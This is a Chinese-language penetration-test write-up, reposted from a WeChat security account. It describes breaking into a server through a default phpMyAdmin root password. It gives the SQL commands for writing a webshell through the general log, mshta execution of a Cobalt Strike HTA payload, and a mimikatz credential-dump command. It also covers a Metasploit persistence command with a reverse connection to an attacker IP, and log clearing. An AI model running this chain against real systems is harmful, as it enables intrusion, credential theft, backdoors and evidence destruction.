首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >[每日福利]以弱口令为入口的一次基础的渗透测试

[每日福利]以弱口令为入口的一次基础的渗透测试

作者头像
用户1789928
发布2021-04-13 15:21:56
4570
发布2021-04-13 15:21:56
举报

温馨提示

本文章仅供学习交流使用,文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

通过对目标站点的扫描获取信息,发现开放8081端口

对应web服务为phpmyadmin,这种页面我能想到的只有弱口令和空密码了 奈何本人太菜了

试了下弱口令root 我进去了 默认密码,有什么好说的

进了这里首先想到通过日志写shell

前提:

1.Root数据库用户(root权限)

2.网站绝对路径(确定有写入权限)

3.magic_quotes_gpc:Off(关闭)

一三项几乎不用管 一般你root账户登录进去都是很高的权限

剩下的就是找网站绝对路径 点击变量

这貌似也不能通过这个摸索出路径 只好找找其他地方

我这里使用了dirsearch尝试扫描改站目录,是否用探针文件泄露

扫描出了几个默认的探针名,以为要搞定了 结果访问一看是没有显示的

貌似没有搞 只有继续尝试下其他方法

这里扫出了tmp文件夹 访问下

继续访问

继续访问 报错了 成功爆出了网站路径

对比一下url 可以肯定 D:\Code\phpMyAdmin-4.9.0.1-all-languages\

为网站绝对路径:

有了路径开始sql语句写webshell:

查看日志是否开启

show variables like ‘%general%';

开启日志

set global general_log = on;

设置日志路径

set global general_log_file = ‘/var/www/html/11111.php';

写上一句话

找到文件后 命令执行下 执行成功 拿到shell 开始下一步

webshell链接:

sy权限 不用提权

之后为了进行有效的内网渗透得想办法让目标上线MSF或者CS

这里我选择的上线CS

这里我选择的web application执行文件

生成恶意hta文件:

先查看下对面有没有AV

没有AV 奥利给

Copy恶意链接

终端mshta执行hta木马

成功上线

查看权限 sy

开放3389 不上远程的黑客不是好黑客

新建个用户YDT

提升权限

成功远程服务器

新建的用户桌面没有啥意思 得上线管理员的桌面才有意思 这里我上传个猕猴挑

通过命令

mimikatz.exe privilege::debug sekurlsa::logonpasswords exit>C:\programdata\1.txt

成功拿到管理员账户

管理员在线写代码可海星

为了世界被破坏 为了维护地球的和平 接下来再用msf做一个权限维持:

使用metasploit自带的H门进行权限维持

我这里用的persistence

command: run persistence -X -i 2 -p 8888 -r 123.123.123.123 
-X指定启动的方式为开机自启动
-i反向连接的时间间隔(2s) 
–r 指定攻击者的IP

此时目标C盘已经生成了我们使用msf生成的vbs文件:

写入开机启动项:

收到权限维持后的metepreter:权限维持结束

准备开溜 把痕迹给清理了:

清除远程连接日志:

福利:

本文中使用的清除痕迹,日志的脚本,关注公众号回复wipe_log,即可获取

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-12-20,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 M78安全团队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 使用metasploit自带的H门进行权限维持
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档